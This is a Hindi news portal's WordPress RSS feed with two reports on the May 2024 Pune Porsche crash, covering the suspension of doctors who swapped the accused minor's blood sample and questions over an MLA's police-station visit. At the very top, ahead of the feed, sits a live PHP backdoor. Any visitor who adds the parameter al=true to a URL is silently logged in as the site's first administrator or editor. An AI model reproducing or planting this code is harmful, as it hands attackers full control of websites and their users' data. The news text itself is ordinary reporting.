// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Pune Porsche Car Accident – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 30 May 2024 11:46:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 पुणे पोर्श कार हादसा : नाबालिग के खून का नमूना बदलने वाले दो डॉक्टर निलंबित https://pratyushaashakinayikiran.com/?p=35855 Thu, 30 May 2024 11:46:00 +0000 https://pratyushaashakinayikiran.com/?p=35855 मुंबई
 महाराष्ट्र सरकार ने 19 मई के पोर्श कार हादसे के आरोपी नाबालिग का खून का नमूना बदलने वाले पुणे के ससून जेनरल हॉस्पिटल के दो डॉक्टरों को बुधवार को निलंबित कर दिया। हादसे में पोर्श कार से कुचलकर दो लोगों की जान चली गई थी। एक अधिकारी ने बताया कि अस्पताल से डीन डॉ. विनायक काले को ‘जबरन अवकाश’ पर भेज दिया गया है और उनका कार्यभार दूसरे सीनियर डॉक्टर को दे दिया गया है।

चिकित्सा शिक्षा एवं अनुसंधान निदेशालय (डीएमईआर) ने बुधवार को इस संबंध में अधिसूचना जारी की। इसके अनुसार डॉ. अजय तावड़े और डॉ. शिशिर हलनोर को तत्काल प्रभाव से निलंबित किया गया है। इससे पहले डॉ. पल्लवी सापले के नेतृत्व में तीन सदस्यीय समिति ने दो दिन तक इस बात की जांच की कि किन परिस्थितियों में खून के नमूने बदले गये थे।
दोनों डॉक्टर 31 मई तक पुलिस की हिरासत में हैं। अब तक हुई जांच में पता चला है कि दोनों डॉक्टरों ने नाबालिग के खून के नमूने को डस्टबिन में फेंक दिया था और उसकी जगह किसी और का खून का नमूना लेकर उसके आधार पर अपनी रिपोर्ट दी थी। हालांकि पुणे पुलिस ने आरोपी का एक और खून का नमूना लिया था जिसे जांच के लिए दूसरे अस्पताल भेजा गया था। रिपोर्ट में अंतर आने पर मामले का खुलासा हुआ।

सरकार ने समिति का किया गठन

वहीं, सरकार ने किशोर न्याय बोर्ड के सदस्यों के आचरण की जांच करने के लिए एक समिति गठित की है। फोरेंसिक मेडिसिन विभाग के प्रोफेसर और प्रमुख डा अजय तावड़े और ससून अस्पताल के चिकित्सा अधिकारी डा श्रीहरि हल्नोर को निलंबित करने का आदेश महाराष्ट्र चिकित्सा शिक्षा विभाग के आयुक्त द्वारा दी गई सिफारिश पर दिया गया था।

इस आधार पर डॉक्टरों को किया गया निलंबित

चिकित्सा शिक्षा मंत्री हसन मुश्रीफ ने कहा कि राज्य सरकार को आरोपों की जांच के लिए नियुक्त तीन सदस्यीय समिति से एक रिपोर्ट मिली है। समिति की रिपोर्ट के आधार पर दोनों डॉक्टरों को निलंबित किया गया है। डॉ चंद्रकांत म्हास्के पुणे जिले के बारामती स्थित पुण्यश्लोक अहिल्यादेवी सरकारी मेडिकल कॉलेज के मौजूदा डीन हैं।

हादसे में दो लोगों की हुई थी मौत

गौरतलब है कि 19 मई की सुबह पुणे के कल्याणी नगर इलाके में 17 वर्षीय किशोर ने तेज रफ्तार पोर्श कार से मोटरसाइकिल सवार दो आइटी इंजीनियर को टक्कर मार दी थी। दोनों की मौके पर ही मौत हो गई थी। पुलिस का कहना है कार चला रहा किशोर बिल्डर विशाल अग्रवाल का बेटा है, जो कि कार चलाते वक्त नशे में था। किशोर उस वक्त नशे में था या नहीं इसके लिए उसके ब्लड सैंपल एकत्र कर जांच के लिए भेजे गए।

क्या है ब्लड सैंपल से जुड़ा मामला?

पुलिस ने दावा किया कि पुणे के ससून अस्पताल में किशोर के ब्लड सैंपल को फेंक कर और उसकी जगह किसी अन्य व्यक्ति के सैंपल रखे गए थे। इन सैंपलों में शराब का कोई निशान नहीं था। इसके लिए महाराष्ट्र चिकित्सा शिक्षा विभाग ने ग्रांट्स मेडिकल कालेज की डीन डा पल्लवी सापले की अध्यक्षता में समिति का गठन किया था।

किशोर न्याय बोर्ड के सदस्यों के आचरण की होगी जांच: नारनवरे

राज्य महिला एवं बाल विकास विभाग के आयुक्त प्रशांत नारनवरे ने कहा कि हमने एक समिति गठित की है जो राज्य सरकार द्वारा नियुक्त किशोर न्याय बोर्ड के सदस्यों के आचरण की जांच करेगी और यह देखेगी कि कार दुर्घटना मामले में आदेश जारी करते हुए नियमों का पूरी तरह पालन किया गया या नहीं। नारनवरे ने कहा कि मेरे पास राज्य सरकार द्वारा नियुक्त सदस्यों के आचरण की जांच करने के लिए किशोर न्याय अधिनियम के तहत शक्तियां हैं।  

दुर्घटना के समय कार में विधायक का बेटा भी था: पटोले

वहीं, कांग्रेस की महाराष्ट्र इकाई के अध्यक्ष नाना पटोले ने दावा किया कि एक विधायक के बेटे समेत कुछ हाई प्रोफाइल लोगों ने पब में शराब पी और पोर्श कार में सवार थे। पटोले ने सवाल किया कि वह मंत्री कौन है,जिसने थाने में फोन किया और वह विधायक कौन है, जिसका बेटा कार में मौजूद था? उन्होंने इस घटना पर मुख्यमंत्री एकनाथ शिंदे से बयान की मांग की। पुणे पुलिस के अधिकारियों ने बताया कि अभी तक घटना में विधायक सुनील टिंगरे का कोई संबंध सामने नहीं आया है, जिससे उनकी जांच हो।

 

]]>
पुणे केस में पुलिस ही नहीं MLA पर भी उठ रहे सवाल, 3 बजे रात को थाने में मौजूदगी पर घिरे, दी ये सफाई https://pratyushaashakinayikiran.com/?p=33400 Thu, 23 May 2024 14:06:00 +0000 https://pratyushaashakinayikiran.com/?p=33400 पुणे

पुणे पोर्श कार ऐक्सीडेंट (Pune Porsche Car Accident) मामले में नया अपडेट सामने आया है. अजित पवार के नेतृत्व वाली NCP के विधायक सुनील तिंगरे 19 मई की रात को येरवडा पुलिस स्टेशन में मौजूद थे. विपक्ष के मुताबिक टिंगरे पुलिस पर दबाव बना रहे थे. सुनील तिंगरे ने इन आरोपों पर सफाई दी है. उन्होंने कहा कि सुबह 3:21 बजे मेरे पीए की तरफ से फोन आया कि एक बड़ा हादसा हो गया है. इसके बाद कई कार्यकर्ताओं और विशाल अग्रवाल की भी कॉल मेरे पास आई.

विशाल अग्रवाल ने बताया कि मेरे बेटे को कुछ लोगों ने पीटा है. इसके बाद मैं पुलिस स्टेशन पहुंचा. फिर पुलिस ने मुझे सूचना दी. इसके बाद मैंने पुलिस से कानून के मुताबिक कार्रवाई करने को कहा. मैंने मृतक के परिजनों से भी बात की.

सुनील तिंगरे ने कहा कि मैंने हमेशा पब और बार के खिलाफ स्टैंड लिया है. राजनीतिक में आने से पहले मैं विशाल अग्रवाल के साथ काम करता था. यही उनके और मेरे बीच का रिश्ता है. मैंने मृतक के परिजनों की मदद की. मैं थाने के सीसीटीवी फुटेज खोलने की मांग करता हूं.

मामले में पुलिस ने अब तक क्या कार्रवाई की?

पुणे की एक अदालत ने मंगलवार को मामले में तीन आरोपियों- बार मालिक और रेस्टोरेंट्स के दो मैनेजर को 24 मई तक पुलिस हिरासत में भेज दिया है. यहां नाबालिग आरोपी ने अपने दोस्तों के साथ बैठकर शराब पी थी, उसके बाद वो कार लेकर बाहर निकला था. आरोपी कोसी रेस्टोरेंट के मालिक के बेटे नमन प्रहलाद भूतड़ा, उसके मैनेजर सचिन काटकर और ब्लैक क्लब होटल के मैनेजर संदीप सांगले को अदालत में पेश किया गया था.

पुलिस ने  सात दिन की कस्टडी की मांग की थी. पुलिस ने तर्क दिया कि आरोपियों के स्वामित्व या प्रबंधन वाले बार-रेस्टोरेंट में आरोपी लड़के और उसके दोस्तों को उनकी कम उम्र (शराब पीने की कानूनी उम्र 21 वर्ष) की पुष्टि किए बिना शराब परोसी. पुलिस ने अदालत को बताया कि उन्होंने कोसी रेस्टोरेंट के मालिक प्रल्हाद भुटाडा को नोटिस भेजा है. जरूरत पड़ने पर उनसे पूछताछ के लिए उपलब्ध रहने के लिए कहा है.

पुलिस के मुताबिक, हालांकि प्रल्हाद भूतड़ा प्रतिष्ठान का मालिक है, लेकिन वो होटल के डेली मैनेजमेंट का काम नहीं देखता है. वहीं, पुणे जिला कलेक्टर के आदेश पर राज्य उत्पाद शुल्क विभाग ने दोनों प्रतिष्ठानों को सील कर दिया है. पुलिस कमिश्नर कुमार ने बताया कि एक अन्य आरोपी जयेश बोनकर को भी गिरफ्तार कर किया गया है. ये ब्लैक क्लब होटल में कर्मचारी है

घटना के बाद क्या कर रहा है प्रशासन?

कल्याणी नगर हादसे के बाद पुणे नगर निगम अलर्ट मोड पर है. नगर निगम ने कोगेगांव पार्क में 2 और अवैध पबों पर कार्रवाई की. अवैध अतिक्रमण के उल्लंघन पर वाटर्स और ओरिला दोनों पबों को ध्वस्त कर दिया गया है. पुणे नगर निगम का कहना है कि शहर के अन्य सभी पब और बार को भी नोटिस भेजा जाएगा.

]]>